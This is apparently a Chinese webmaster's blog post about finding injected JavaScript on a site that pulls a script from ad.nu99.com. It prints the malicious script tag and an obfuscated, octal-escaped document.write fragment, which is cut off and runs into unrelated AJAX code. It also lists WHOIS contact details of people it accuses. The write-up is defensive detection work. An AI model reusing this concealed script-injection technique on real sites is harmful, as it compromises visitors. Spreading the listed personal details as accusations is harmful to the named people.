最近网站被挂马,导向nu99.com。通过查看网页源文件,竟无从查询。再通过开发人员工具,可以找到<script src='http://ad.nu99.com/ip.asp?loc=beijing></script>,想必是通过js所为。
网站t源代码表明网页并未被改变,从而证实了自己的观点。但是对调用的js进行搜索,意外的是也查询不到相关脚本。难道是服务器端出现问题?但问题的本质是,直接通过另存的静态页面也查询不到。难道是我浏览器中病毒了,我甚至怀疑难道是百度的广告代码有问题了?
通过对另存后的静态页面中的js代码进行屏蔽,最终发现问题还是出现在自己的js代码中。js首尾并没有异常,一步步的排查在脚本中部发现如下代码。
document.write("<\163cr"+"ipt src='http://\141d."+"\156u9"
function processReqChange() {
// 监视数据传递。
if (req.readyState == 4) {
if (req.status == 200) {
xmlResponse(); // connect OK 执行输出函数out()
} else { //抛出错误
alert("无法正常连接服务器,错误:/n" +
req.statusText+":"+req.status);
}
}
}
这是一段对写入内容做了编码的代码,其目的就是为了不让站长可以直接查询到,因此无法定位问题所在。如此恶心的挂马,悭吝之极。 nu99.com在2011年的时候似乎已经开始作恶,也有各大站长对其曝光,这里我们转载这些信息,让各大站长小心
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com
hasom@foxmail.com 下的其他域名:wa66.com oy66.com zom123.net mp3tj.com
ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号 审核通过时间: 2009-09-07
主办单位名称: 钟艺
域名:wa66.com oy66.com zom123.net
备案/许可证号: 粤ICP备09132699号 审核通过时间: 2009-07-20
主办单位名称: 罗新华
域名:mp3tj.com
之所以在这里列出改域名所有人的一些信息,不仅是想谴责下那些别有用心的挂马人,更希望饱受过该人骚扰的同学继续努力,找出真凶,为营造和谐互联网而努力!
此外,通过对服务器同IP网站发现,其他凡是有JS的站都有迹象被挂马。挂马并不是每个js都被注入,可以说关键JS才被添加类似的代码,并且loc"+"=beijing' 似乎也根据各个网站而不同,以上让人不难想到此台服务器已被攻破,抑或服务商内鬼所为。
6947
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
